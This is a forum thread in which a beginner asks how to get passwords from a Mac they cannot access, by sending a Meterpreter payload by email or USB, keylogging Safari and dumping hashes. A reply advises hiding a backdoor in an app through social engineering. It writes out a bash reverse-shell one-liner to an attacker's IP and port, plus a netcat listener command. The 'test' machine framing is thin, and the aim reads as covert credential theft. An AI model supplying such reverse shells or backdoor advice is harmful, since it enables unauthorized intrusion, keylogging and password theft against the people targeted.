I'm trying to get passwords out of a Mac computer. I'm using Kali, Linux, and i have my "test" Mac. I'm a newbie, but i've read SO MUCH, all the Linux basics, getting started with metasploit etc.
I don't have the Rhost, and we're not connected to the same LAN.
I've been reading so many posts and leaning a lot on https://null-byte.wonderhowto.com/how-to/use-meterpeter-os-x-0164542/ however, this hasn't worked for me, it keeps giving me the same respons, that it can't connect. I've been looking at my router, and port forwarding is open on the ports i'm using, however i'm not sure if they are on my networking card (On windows you have to configure it in systems>network settings) - how do i do that on Kali, if necessary?
As Lhost i'm using my external IP, and internal just goes to 0.00.0.0.0 (Source; https://community.rapid7.com/thread/4419
I've been looking at the newest exploits and payloads for oxs.
What i want to do is actually send a meterpreter via mail og given as an USB (or directed to a website but preferably the others), start a persistent session that will keylog on safari, AND probably hashdump to get passwords. Are there any tutorials i've missed, or which way around this would you go?
Thank you for helping a newbie get started! :-)
3 Responses
Oh, and of course i've read https://null-byte.wonderhowto.com/how-to/create-backdoor-osx-0162551/, however that requires access to the system, which i don't have. Yes, i know - i jumped out in the deep end of the swimming pool, learning by doing! :-)
This can be done with some social engineering skills, sending a backdoor embedded in an app (written in Swift for example). The code to send an interactive shell to your machine is:
bash -i > /dev/tcp/<IP attacker>/<Port attacker> 2>&1 0>&1
You need a listener on your machine to catch the shell:
nc -lp <Port attacker>
Note: You won't obtain a meterpreter session but a bash session, but that's not a problem because bash is very powerful (not like cmd in Windows).
I'm currently using SET, wanting to create a USB to send it on.
I've no previously experience with Bash, however i've been reading up on it.
I'll give it a go, however i will not be using the Swift app.
https://null-byte.wonderhowto.com/how-to/dont-be-script-kiddie-part2-building-auto-exploiter-bash-script-0166723/ - i guess that's a good place to start, actually the only good tutorials i've found on Bash scripting.
Share Your Thoughts